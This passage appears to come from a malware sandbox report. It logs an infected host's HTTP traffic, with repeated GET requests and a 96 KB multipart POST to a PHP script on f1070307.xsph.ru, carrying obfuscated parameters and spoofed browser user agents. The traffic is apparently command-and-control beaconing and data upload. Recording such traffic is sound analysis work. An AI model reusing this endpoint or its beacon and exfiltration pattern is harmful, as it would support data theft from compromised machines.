SsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&7603066d178d57644cba1e85f0eb372c=QX9JSUNJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1IDOzgTYyEWM1gTOkNWMiFWMiBjZ3YDZhV2YxM2NjlzNzcjNkNzNjJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ru
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXaJ9kSp9UaJdkTrp0VPdXTtpFaOd1TxUlMNxmV61EaSdlWqJ1VZtmSqpVNFR1ToplaaNTSX5UaOpWW5lVbJNXSpRVavpWSt5kaaxmSqp1aO1mW1cmaZlmQq10aGdVW3VlMONzZ6lFeJdkW5lERPFTSX1UNnpWTxEFRNlmSDxUa0sWS2k0UPhmRt5EeBRlTtxGVaNzZ65ENZpWW0k1RPFTVqpleVdVTxsmaOBzZU9UeFpmTykEROhmVy0Ua3lWSPpUaPlWVt1UbSRUT610VNdXVyk1akRlTzkkaOhmWH1UboR0TxkFVZNTSH9UeBpWW4lEVOlXTE1UbKpWSzlUaUl2bqlEakRkTyMGVORzaE5UNZpXWtZERPpmRE10aCpWTzUkMOpXTUllMnRlT1UUbZVza65UMRRkWpp0QMlGNrlkNJNVTsZFVOlmQUllMZRVTycGVZh3aU50MNd1T3lEROpXWE5UaCpnTsZEVNlXSq50MVRUTxk1VOl2dpl0TKl2TplERPp3Z61UMBRUToxmaZtmWt50dNd0T1E1VNhGaUl1aadUTpp1VapXRtl1dZJTWsJVbNVTSql0cJlGVp9maJBTRql1dFdkWpRGROVTUU5EbGRVTtZlMZp3aU90dZpWWtZ1RN1mTU5UMJRkW5FVbNdXTE10MJNETpRzaJZTSp5EaKpmWykFROpXUUpleZ1mT4tGRPtmSU5kMNdlW00ERalmRE5EeFdVT4dGRaBTVt5EasRlTpdXaJ9kSp9UajRlTxE1RPpXW61EaGR0ToZkeOlXRU5UbSdUTwElMOtmSH9UerpXT00kaalXRt1ENNRlWzElaJNXSpRVavpWS0EEVZlmTH1ENJpXWyEFVORzY6llaapWW1UFVNFTUq50dV1mTzUFVZRTVX9UaspnT4VkMZBTSDxUa0sWS2kUaZxmRXlFNnpWW3FEVZtGZ65UaSRUToZ1RONTTU9kMJRVT5lEVOhmWU5EeVRkWrZ1VOJTRtpVa3lWSPpUaPlWWE5EaGdVWqZkeONTSt50dNdkT3tmaNVTRq5UNJR0ToRGVNhmWXpFNRdkT5VlaNhXUykVeV1WSzlUaUl2bqlUeZRVTo5keZhmSE1UaOdUTyE1VahmRH9keNpmWrxGVPpXQql1dJpmWzcGRNxmUq10dRdlWpp0QMlGNrlkNJlXT3llMOlmTyk1djRkT6lkaaFTVtpFNBRkWpZleNdXUX5UeFR0T1EkaNhXTykFbCpmT6NmaOl2dpl0TKl2TpFVbNhmTH10MZdkW4tmeZl3Z6l1dNdlT310RPhGZq1kerpmWtJleONTVX5EMVR1Tq5kaZlmRql0cJlGVp9maJFTSEpFbOJTW5FFVNhmRU5kMJJTT6NGVPhXW65UNJ1mTyklaOhmWHpVNZRlWtpVbOhGaUpFeJNETpRzaJZTSD5UakRlWp50VahXTX5keZRUTzE1VPhXTtlFNZdkWwklaapXR61EbKRlT4NmaOh3ZqpFNjR0TpNnbPlWRHRGaSVEZ0YVbJNXVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd
Source: global traffic	HTTP traffic detected: POST /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryi5BcUS04v1zh5p3RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: f1070307.xsph.ruContent-Length: 96625Expect: 100-continue
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=d1nIiojIyMWY1QzN2QWMjdDMhRTZzI2MxUWNkZmYmFGOlRDOhFmIsIiNmFmY2gDOihDZ5QmZ2kDZzUGZ4ETYyE2YmVjY2gjNjRjMjZmNmlDOiojI0cDOwEGOygjM3EmZ2YmZmhDZhlDOwUmY5MGOwEWN4AjIsIiYkFTN1ETYkZTN0YDNmNzNwcDO5QmYkFmYwEDO5AzMxITO2QzMmBDZiojIjdjNhFzMkFjYxQGOkJ2YwQTMmVzNwUjM5MDNzQGNyYjI7xSfiElZ5oUaUl2bqlEMVpmTqpkMNpmUH5EbWRlTyk0RPlmSq1EbkRVW1sGVadXS65UaadVTzsGVZRTQql1MrpmT4l0QMlGNrlkNJN0T5FlMZFTU6llerRVWqJEVZdXU6lVNBRkWtZ1VNhXRH1EenRVW3llMOBTVt5EaGdVW0Ukaal2dpl0TKl2Tpl0ROtmSX90dN1mWo50VPFTVy0EbWpXToJ1VapmUXl1aKpmW1UEVPhmWqp1MJdlTp5kaZlXWtl0cJlGVp9maJ1mTqpFbKpmWr5UbaVzZqlVaCpWTrZ0VZdXVy40MnpXW4l0RalXSE9UMJdVT1cmaNFTUE1UaKNETpRzaJZTST9EaG1mT4FEVO1GbUp1MnpnT0klaZRTWH9UMVpmW6V1VNFzaq5EMnR1T5VkaOJTSE5EaWJTTpdXaJ9kSp9UaV1WTtJFRNpXTX10dVJTWrRGVONTSq5EaadUTthGRPFTWUl1MJd0T5FkaZhXSU5UeNRUTtpkaJNXSpRVavpWSoRGROJzYU5ENrRkT1kleZ1mRE9kaGRUTrJkaNNTRy4keNRVWycGVOVTRtlVNrpnTxEFRalmSDxUa0sWS2k0UNxmVU5UaCRVWykFVNJzZUlFerRlTz00VPdXSE5keZRkTpJkeOxmRU1UeJpmTzUFRNFTWX5Ua3lWSPpUaPlWSE9kenpXTxEERNhGbql1aa1mT310RPVTUX1EaoRVWrp1RNlmWXpleF1WW3llMZxmUt1UNJpWSzlUaUl2bqlEMFpWW3V0RalGZE5UNRRlTsZEVN1mVyklerR1T3llaZ1mVH1UbORlTxkERalXUt10dNRUTzk0QMlGNrlkNJlmTopkaaJTWE5keRRlW6lVbOh3aE90aKRlTy00VaRTTEpVaGRkT4V0VNh3ZEpFMV1mToxGVOl2dpl0TKl2TpNGVOFTUH9keZpXToZERPhmR65UeFRlTtJ1RNBTUy40aKd0T5tmeNRTTqpVeF1WT00EVaNTUql0cJlGVp9maJRTQUlVaOdUT0kkeZJTUU5ENjpXWqplaZVTVU1UMRpmT3VVbONTVUlFNVd1TpxmeOhXRykFMJNETpRzaJZTSplFbGdVW0cmaZdXQUl1akpnTpJFRNhmVH50MNR1TykEVNlXSU5EaaRlT4VFRatmVX5kMF1mWpdXaJ9kSp9UaZRkToZ0VZpmR650MJ1mT310ROd3aq1UNFpmT1kERPhGZU1EaadlW0E1ROlXVq1EeRJTW5VVbJNXSpRVavpWS5lFVNhmT6lFaKRUTp50RNJTUXpFaGd0T61kaatGbU9keBpWW3lkaaNzZE1EbSpWT3F1ValmSDxU